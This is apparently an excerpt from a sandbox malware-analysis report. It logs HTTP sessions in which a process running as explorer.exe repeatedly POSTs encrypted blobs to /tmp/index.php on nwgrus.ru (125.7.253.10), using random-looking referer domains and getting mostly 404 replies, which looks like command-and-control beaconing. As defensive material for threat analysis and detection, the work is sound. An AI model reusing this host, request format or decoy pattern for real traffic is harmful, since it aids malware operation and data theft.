Oct 14, 2024 06:03:05.173717022 CEST	251	OUT	Data Raw: 3b 6e 22 16 80 cd 1c 53 d8 db b5 03 01 70 7b bc 7b 09 ce e6 1f 09 e1 6a 00 7f 7f 97 45 c5 c3 1d 9e 5e b4 2a 07 65 24 6a e8 e9 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 05 6b 2c 90 f5 76 0b 75 4d 4c f0 8d Data Ascii: ;n"Sp{{jE^e$j?!0jHYcM@NA -[k,vuML8\|429&v?3X/uc;PQXObO9Oe762?=)V8v:~!q}IcX{ps
Oct 14, 2024 06:03:06.773724079 CEST	137	IN	HTTP/1.1 200 OK Server: nginx/1.26.0 Date: Mon, 14 Oct 2024 04:03:06 GMT Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.6	50002	125.7.253.10	80	4004	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 14, 2024 06:03:06.783716917 CEST	282	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://doyodlaoiwpyujb.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 210 Host: nwgrus.ru
Oct 14, 2024 06:03:06.783741951 CEST	210	OUT	Data Raw: 3b 6e 22 16 80 cd 1c 53 d8 db b5 03 01 70 7b bc 7b 09 ce e6 1f 09 e1 6a 00 7f 7f 97 45 c5 c3 1d 9e 5e b4 2a 07 65 24 6a e8 e9 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1a 6b 2c 90 f5 76 0b 75 5e 28 bf 87 Data Ascii: ;n"Sp{{jE^*e$j?!0jHYcM@NA -[k,vu^(R}F6GXCKN_jW3_NCRX2CT,V{l@bZB97TI9_K
Oct 14, 2024 06:03:08.494596004 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 14 Oct 2024 04:03:07 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.6	50003	125.7.253.10	80	4004	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 14, 2024 06:03:08.503218889 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://foywayqrovd.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 255 Host: nwgrus.ru
Oct 14, 2024 06:03:08.503252983 CEST	255	OUT	Data Raw: 3b 6e 22 16 80 cd 1c 53 d8 db b5 03 01 70 7b bc 7b 09 ce e6 1f 09 e1 6a 00 7f 7f 97 45 c5 c3 1d 9e 5e b4 2a 07 65 24 6a e8 e9 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1b 6b 2c 90 f5 76 0b 75 76 03 db e5 Data Ascii: ;n"Sp{{jE^e$j?!0jHYcM@NA -[k,vuvk8`lb>1yZb=\BHT8H E3q_Rxi?>tS(D"H:Uf}Hs,7'
Oct 14, 2024 06:03:10.116532087 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 14 Oct 2024 04:03:09 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.6	50004	125.7.253.10	80	4004	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 14, 2024 06:03:10.127156973 CEST	282	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://eekncfsmpbrkmlo.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 338 Host: nwgrus.ru
Oct 14, 2024 06:03:10.127182007 CEST	338	OUT	Data Raw: 3b 6e 22 16 80 cd 1c 53 d8 db b5 03 01 70 7b bc 7b 09 ce e6 1f 09 e1 6a 00 7f 7f 97 45 c5 c3 1d 9e 5e b4 2a 07 65 24 6a e8 e9 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 18 6b 2c 90 f5 76 0b 75 56 19 fe b9 Data Ascii: ;n"Sp{{jE^*e$j?!0jHYcM@NA -[k,vuVQjiSam,\|/akUV6?IqZL^=l/,s,-CN xlocN[I26)cYMa-fr%1,
Oct 14, 2024 06:03:11.620177984 CEST	137	IN	HTTP/1.1 200 OK Server: nginx/1.26.0 Date: Mon, 14 Oct 2024 04:03:11 GMT Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.6	50005	125.7.253.10	80	4004	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 14, 2024 06:03:11.631721020 CEST	282	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://clxaxfnyuedfqps.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 363 Host: nwgrus.ru
Oct 14, 2024 06:03:11.631755114 CEST	363	OUT	Data Raw: 3b 6e 22 16 80 cd 1c 53 d8 db b5 03 01 70 7b bc 7b 09 ce e6 1f 09 e1 6a 00 7f 7f 97 45 c5 c3 1d 9e 5e b4 2a 07 65 24 6a e8 e9 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 19 6b 2c 90 f5 76 0b 75 41 17 b4 98 Data Ascii: ;n"Sp{{jE^e$j?!0jHYcM@NA -[k,vuA>Ugbc'qQ1m?q;<FZtB]`O_.s#A(Yn^ZYcSgA]_pZZaf.@
Oct 14, 2024 06:03:13.110871077 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 14 Oct 2024 04:03:12 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.6	50006	125.7.253.10	80	4004	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 14, 2024 06:03:13.120213985 CEST	281	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://uimdgsgyvhhaem.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 172 Host: nwgrus.ru
Oct 14, 2024 06:03:13.120213985 CEST	172	OUT	Data Raw: 3b 6e 22 16 80 cd 1c 53 d8 db b5 03 01 70 7b bc 7b 09 ce e6 1f 09 e1 6a 00 7f 7f 97 45 c5 c3 1d 9e 5e b4 2a 07 65 24 6a e8 e9 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1e 6b 2c 90 f5 76 0b 75 6f 41 d5 9f Data Ascii: ;n"Sp{{jE^*e$j?!0jHYcM@NA -[k,vuoAAEz:Is0exqoJ+aV3\3'RKRuK6nKC
Oct 14, 2024 06:03:14.871304035 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 14 Oct 2024 04:03:14 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.6	50007	125.7.253.10	80	4004	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 14, 2024 06:03:14.883373976 CEST	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://eeyuetrukjpircst.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 249 Host: nwgrus.ru
Oct 14, 2024 06:03:14.883388996 CEST	249	OUT	Data Raw: 3b 6e 22 16 80 cd 1c 53 d8 db b5 03 01 70 7b bc 7b 09 ce e6 1f 09 e1 6a 00 7f 7f 97 45 c5 c3 1d 9e 5e b4 2a 07 65 24 6a e8 e9 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1f 6b 2c 90 f5 76 0b 75 72 04 f1 ae Data Ascii: ;n"Sp{{jE^*e$j?!0jHYcM@NA -[k,vurtfR6P/qcs20JT7+'r."P`1TSs^n,tA.2n5M\|,3{ZE7'RqygU'J
Oct 14, 2024 06:03:16.441132069 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 14 Oct 2024 04:03:16 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.6	50008	125.7.253.10	80	4004	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 14, 2024 06:03:16.449224949 CEST	281	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ydaciekeaeuaol.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 188 Host: nwgrus.ru
Oct 14, 2024 06:03:16.449242115 CEST	188	OUT	Data Raw: 3b 6e 22 16 80 cd 1c 53 d8 db b5 03 01 70 7b bc 7b 09 ce e6 1f 09 e1 6a 00 7f 7f 97 45 c5 c3 1d 9e 5e b4 2a 07 65 24 6a e8 e9 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1c 6b 2c 90 f5 76 0b 75 26 48 e8 aa Data Ascii: ;n"Sp{{jE^*e$j?!0jHYcM@NA -[k,vu&HA`u:[>%}ce\|}>tJ==z#ONF8?7`-VWyM
Oct 14, 2024 06:03:18.047068119 CEST	137	IN	HTTP/1.1 200 OK Server: nginx/1.26.0 Date: Mon, 14 Oct 2024 04:03:17 GMT Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.6	50009	125.7.253.10	80	4004	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 14, 2024 06:03:18.059562922 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://voyqfwrggnp.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 295 Host: nwgrus.ru
Oct 14, 2024 06:03:18.059576035 CEST	295	OUT	Data Raw: 3b 6e 22 16 80 cd 1c 53 d8 db b5 03 01 70 7b bc 7b 09 ce e6 1f 09 e1 6a 00 7f 7f 97 45 c5 c3 1d 9e 5e b4 2a 07 65 24 6a e8 e9 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1d 6b 2c 90 f5 76 0b 75 79 19 dc 8c Data Ascii: ;n"Sp{{jE^e$j?!0jHYcM@NA -[k,vuy_$klfu32$$X@{N@T8{G=e(Y\|_Wz4fV\|w?}D6%g``v,dm-LFP1
Oct 14, 2024 06:03:19.642184973 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 14 Oct 2024 04:03:19 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.6	50010	125.7.253.10	80	4004	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 14, 2024 06:03:19.653225899 CEST	279	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://blxnotvrjvnu.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 159 Host: nwgrus.ru
Oct 14, 2024 06:03:19.653278112 CEST	159	OUT	Data Raw: 3b 6e 22 16 80 cd 1c 53 d8 db b5 03 01 70 7b bc 7b 09 ce e6 1f 09 e1 6a 00 7f 7f 97 45 c5 c3 1d 9e 5e b4 2a 07 65 24 6a e8 e9 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 12 6b 2c 90 f5 76 0b 75 42 47 f9 9e Data Ascii: ;n"Sp{{jE^e$j?!0jHYcM@NA -[k,vuBGA_x(a{'<k-I>U);L=~8`\|t]
Oct 14, 2024 06:03:21.149692059 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 14 Oct 2024 04:03:20 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.6	50011	125.7.253.10	80	4004	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 14, 2024 06:03:21.158194065 CEST	280	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://fplvqqohjqdma.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 287 Host: nwgrus.ru
Oct 14, 2024 06:03:21.158229113 CEST	287	OUT	Data Raw: 3b 6e 22 16 80 cd 1c 53 d8 db b5 03 01 70 7b bc 7b 09 ce e6 1f 09 e1 6a 00 7f 7f 97 45 c5 c3 1d 9e 5e b4 2a 07 65 24 6a e8 e9 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 13 6b 2c 90 f5 76 0b 75 31 3b ee f1 Data Ascii: ;n"Sp{{jE^e$j?!0jHYcM@NA -[k,vu1;fYZnq6OVB~m5g[SE(,RElA&2fP{zP4QU;tE}}{*g-eo%Y~
Oct 14, 2024 06:03:22.762264013 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 14 Oct 2024 04:03:22 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 